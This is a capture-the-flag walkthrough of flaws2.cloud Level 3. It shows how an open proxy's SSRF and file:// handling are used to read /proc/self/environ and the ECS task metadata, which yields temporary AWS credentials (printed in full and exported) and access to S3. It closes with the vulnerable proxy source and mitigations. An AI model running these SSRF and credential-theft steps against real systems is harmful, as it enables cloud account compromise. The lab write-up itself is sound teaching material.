
Level 3

Exploring the proxy

We can use the proxy to request more or less any website (HTTP only). Confirm this with icanhazip.com, which reflects the requester's IP. For the proxy it is “”:

[email protected]:/# curl -i http://container.target.flaws2.cloud/proxy/http://icanhazip.com/
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 22 Nov 2019 08:36:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

This is indeed the public IP of the proxy:

[email protected]:/# dig container.target.flaws2.cloud
container.target.flaws2.cloud. 377 IN   A

Accessing task metadata

This looks remarkably similar to level 5 of flaws.cloud. In that level, an EC2 machine hosts a proxy. It can be compromised by accessing the instance metadata service. Why not just try the same thing here:

[email protected]:/# curl -i http://container.target.flaws2.cloud/proxy/
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 22 Nov 2019 08:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Sad, no output. Why is that? ECS has a similar but slightly different thing called the task metadata service, as documented here. Interestingly, there also seems to be a metadata file, but that won’t help us much in this level (further reading). There are two possible versions:

  • Version 2: very similar to the instance metadata service of EC2 machines. You can access it at the link-local IPv4 address “”. From there, just follow the (non-clickable) links or read the documentation to find out where the juicy stuff is.
  • Version 3: more or less the same as version 2, but the endpoint is dynamic. The URI is exposed to the container in the “ECS_CONTAINER_METADATA_URI” environment variable, which adds an additional layer of defense. Better hope that version 2 works.
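The resolution order can be sketched as follows. This is a hypothetical helper, not official SDK code; the fixed version 2 address is the link-local endpoint documented by AWS:

```python
import os

# Fixed link-local address of the version 2 task metadata endpoint,
# as documented by AWS.
V2_ENDPOINT = "http://169.254.170.2/v2/metadata"

def metadata_endpoint(environ=None):
    """Resolve the task metadata endpoint as a client in the task would."""
    env = os.environ if environ is None else environ
    # Prefer the dynamic version 3 URI if the ECS agent injected it.
    uri = env.get("ECS_CONTAINER_METADATA_URI")
    return uri if uri else V2_ENDPOINT

print(metadata_endpoint({}))  # -> http://169.254.170.2/v2/metadata
```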

Try version 2 by requesting curl -s http://container.target.flaws2.cloud/proxy/ | jq. The output is pretty-printed JSON with all the details. Here is part of it:

  "Cluster": "arn:aws:ecs:us-east-1:653711331788:cluster/level3",
  "TaskARN": "arn:aws:ecs:us-east-1:653711331788:task/5782c64d-114b-4c40-8c14-06d59ca07797",
  "Family": "level3",
  "Revision": "3",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "Containers": [
    {
      "DockerId": "55c3211baa020d5e766172e2bd690a1e38ff28d44d4aff7bb42906c0033b25ba",
      "Name": "~internal~ecs~pause",
      "DockerName": "ecs-level3-3-internalecspause-acfae1d980e58decd801",
      "Image": "fg-proxy:tinyproxy",
      "ImageID": "",
    },
    {
      "DockerId": "e858669ed741177c7d316cb6c686090dbd6d6fd75e2d98181bac4dc5847e0710",
      "Name": "level3",
      "DockerName": "ecs-level3-3-level3-a8cf8fd0fd9ccea51300",
      "Image": "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",

So we do have an ECS task with two containers. One is based on the “level2” image we found in the previous level. Based on its name, the other seems to be running tinyproxy. I suspect this is a container used by ECS internally to provide the “awsvpc” networking mode, so we should not care about it too much (compare ECS internals).

So far so good, but how do we get at the credentials? The documentation does not say anything about that. My first try was to go to the same endpoints used in the instance metadata service, for example by appending “/iam/info”. Unfortunately, we only get “Unable to generate metadata …” responses back.

Have a look at the ECS developer documentation instead. It contains all the details about ECS, including how to get the credentials. In there we learn that the endpoint for credentials is dynamic and stored in the environment variable “AWS_CONTAINER_CREDENTIALS_RELATIVE_URI”. Uh oh, we are back to reading environment variables.

The proxy turns out to support the file:// scheme as well (we confirm this when reviewing its source below), so we can simply request “/proc/self/environ”, where Linux exposes all environment variables of the current process in the form of a file.

 # curl --output - http://container.target.flaws2.cloud/proxy/file:///proc/self/environ
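The raw environ output arrives without line breaks because Linux delimits each KEY=VALUE entry in /proc/&lt;pid&gt;/environ with a NUL byte rather than a newline. A small sketch of splitting the raw bytes into a dict (hypothetical helper, sample values):

```python
def parse_environ(raw):
    """Parse /proc/<pid>/environ content: NUL-separated KEY=VALUE pairs."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # the trailing NUL produces an empty chunk
        key, _, value = entry.partition(b"=")
        env[key.decode()] = value.decode()
    return env

sample = b"HOME=/root\x00AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/abc\x00"
print(parse_environ(sample)["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"])
```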

If you make this request you will notice there are no line breaks. I’ve added them above for readability. Now we know where to go for the credentials:

 # curl -s http://container.target.flaws2.cloud/proxy/ | jq
  "RoleArn": "arn:aws:iam::653711331788:role/level3",
  "SecretAccessKey": "Bq9AnAFihjdau4tbb4l1KrIzifXzhWdVlBdIH89c",
  "Token": "FwoGZXIvYXdzEOv//////////wEaDGW1cqeLZ64imCuCBiLgAmsez/FXqR1kaG7vmFZPggaqblIeIZiJ+p+dCJJawIIKFyzM9sfkjtyeV12rGd/58eNNnASObJmC+UHceizhBo8PbthNkHM8FMptzFBUeo/fwqRFCSw8L/kLENn8I7NpiO9ek2DcrEATysZDyuzWve4xBF82PKgOZn2cCErC0y0XGa/UgXlZUM/NgzmqrLSC9SSndReqhU5BLWrcoknzdkTDBu1HRUvs3vLaftsPBcdmNd50B8lN8Jh4EfiZVc3ECo3SZ10xosHXVWmHBZsHcLBPMlDMLvLxZeXryVWrVKMYSWGiWSCZjtrdelZFMBmBS+v7W47i1DMjPZrsoV/pri0TfvpIvFfGW18Th+UQV9NHEi+Al5wmbVRY5JUVUlVvoDLduyutIAMCWqrIemATzs/U4KlYsmI1JSEckmnerqv8J7qjficigWi397P8yuVMrFYiC/l94JeOQWB/TEnCHEUoqN3e7gUyngG+3xenII8s9CTX+jwytMBwdfyHY+2uSB1ez8AxpsL4kDrfIodIXzBE6UuWnwMYEKfhx7m/1L801OP2epDT2zOJQbYeRlxZiFBMomKYB2s0PPyuSIJbTY6BcDrjMaGryE9A+9tSJVkbFA42NuVkHUyT2AMkje69q/C6xzxX0+Wkts+DaqOnnIKjPpZBVEACSoWk6FJeGHF6ePP5gpoi4w==",
  "Expiration": "2019-11-22T15:47:20Z"

As usual, configure credentials and verify if it works:

 # export AWS_SECRET_ACCESS_KEY=Bq9AnAFihjdau4tbb4l1KrIzifXzhWdVlBdIH89c
 # export AWS_SESSION_TOKEN=FwoGZXIvYXdzEOv//////////wEaDGW1cqeLZ64imCuCBiLgAmsez/FXqR1kaG7vmFZPggaqblIeIZiJ+p+dCJJawIIKFyzM9sfkjtyeV12rGd/58eNNnASObJmC+UHceizhBo8PbthNkHM8FMptzFBUeo/fwqRFCSw8L/kLENn8I7NpiO9ek2DcrEATysZDyuzWve4xBF82PKgOZn2cCErC0y0XGa/UgXlZUM/NgzmqrLSC9SSndReqhU5BLWrcoknzdkTDBu1HRUvs3vLaftsPBcdmNd50B8lN8Jh4EfiZVc3ECo3SZ10xosHXVWmHBZsHcLBPMlDMLvLxZeXryVWrVKMYSWGiWSCZjtrdelZFMBmBS+v7W47i1DMjPZrsoV/pri0TfvpIvFfGW18Th+UQV9NHEi+Al5wmbVRY5JUVUlVvoDLduyutIAMCWqrIemATzs/U4KlYsmI1JSEckmnerqv8J7qjficigWi397P8yuVMrFYiC/l94JeOQWB/TEnCHEUoqN3e7gUyngG+3xenII8s9CTX+jwytMBwdfyHY+2uSB1ez8AxpsL4kDrfIodIXzBE6UuWnwMYEKfhx7m/1L801OP2epDT2zOJQbYeRlxZiFBMomKYB2s0PPyuSIJbTY6BcDrjMaGryE9A+9tSJVkbFA42NuVkHUyT2AMkje69q/C6xzxX0+Wkts+DaqOnnIKjPpZBVEACSoWk6FJeGHF6ePP5gpoi4w==
 # aws sts get-caller-identity
    "UserId": "AROAJQMBDNUMIKLZKMF64:5782c64d-114b-4c40-8c14-06d59ca07797",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/level3/5782c64d-114b-4c40-8c14-06d59ca07797"

And again the usual game of trying out what we can do. As in all the other levels, we look for stuff in S3, so try this:

[email protected]:/# aws s3 ls
2018-11-20 19:50:08 flaws2.cloud
2018-11-20 18:45:26 level1.flaws2.cloud
2018-11-21 01:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
2018-11-26 19:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
2018-11-27 20:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud

That was it. Go to the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud and watch the end of the game:

The end of the game

The flaw

Secure the proxy

Review application code

Since we know how to get files, let us pull the proxy’s files out of the running container (we could just look at the image we got from the previous level, but this way it is cooler).

Start by checking the cmdline of the process with PID 1, which should be the one the container was launched with:

# curl --output - http://container.target.flaws2.cloud/proxy/file:///proc/1/cmdline

Good, we now check out “/var/www/html/start.sh” to see what is going on:

 # curl --output - http://container.target.flaws2.cloud/proxy/file:///var/www/html/start.sh
python /var/www/html/proxy.py &

That is a simple one. Now we are just a single call away from the source. Do curl --output - http://container.target.flaws2.cloud/proxy/file:///var/www/html/proxy.py to load the code:

import SocketServer
import SimpleHTTPServer
import urllib
import os

PORT = 8000

class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
  def do_GET(self):
    self.send_response(200)
    self.send_header("Content-type", "text/html")
    self.end_headers()

    # Remove starting slash
    self.path = self.path[1:]

    # Read the remote site
    response = urllib.urlopen(self.path)
    the_page = response.read(8192)

    # Return it
    self.wfile.write(the_page)

httpd = SocketServer.ForkingTCPServer(('', PORT), Proxy)
print "serving at port", PORT
httpd.serve_forever()

Here we can see that the developer intended to make a proxy just for HTTP GET requests but calls “urllib.urlopen” on whatever string the user supplies. No matter the Python version, this function supports other schemes besides HTTP (see the Python 2 and Python 3 docs).
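You can verify the scheme handling locally. Python 3 moved urllib.urlopen to urllib.request.urlopen, but the behavior is the same: a file:// URL is served straight from disk, which is exactly what the proxy lets us abuse (local demo with a throwaway temp file, not against the target):

```python
import os
import tempfile
import urllib.request

# Create a local file standing in for /proc/self/environ.
fd, path = tempfile.mkstemp()
with os.fdopen(fd, "w") as f:
    f.write("secret contents")

# urlopen happily fetches it via the file:// scheme.
with urllib.request.urlopen("file://" + path) as resp:
    data = resp.read().decode()

os.unlink(path)
print(data)  # -> secret contents
```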

The code also confirms that no HTTP method other than GET is supported. “urllib.urlopen” makes GET requests by default and only issues a POST if an additional data argument like data="param=value" is provided. The code at hand passes no such argument, so there is no way to make the proxy send anything but GET requests.
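Reviewing the code also suggests the fix: allow-list the URL scheme before fetching. A hypothetical hardened variant (a sketch, not the actual flaws2 code) could validate the target like this:

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def validate_target(url):
    """Reject anything that is not plain HTTP(S) before proxying it."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError("unsupported scheme: %r" % scheme)
    return url
```

With this check in place, file:// and other non-HTTP schemes fail before ever reaching urlopen.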

Least privilege

Do not give the container access to S3 if not needed.
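As an illustration only (a hypothetical policy, not the one flaws2 actually uses): a task role for a container that merely needs to write logs would grant exactly those actions and nothing else, in particular no s3:* permissions:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
      "Resource": "*"
    }
  ]
}
```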


The same issue as before, but more difficult to exploit this time. AWS is working hard to mitigate this kind of attack.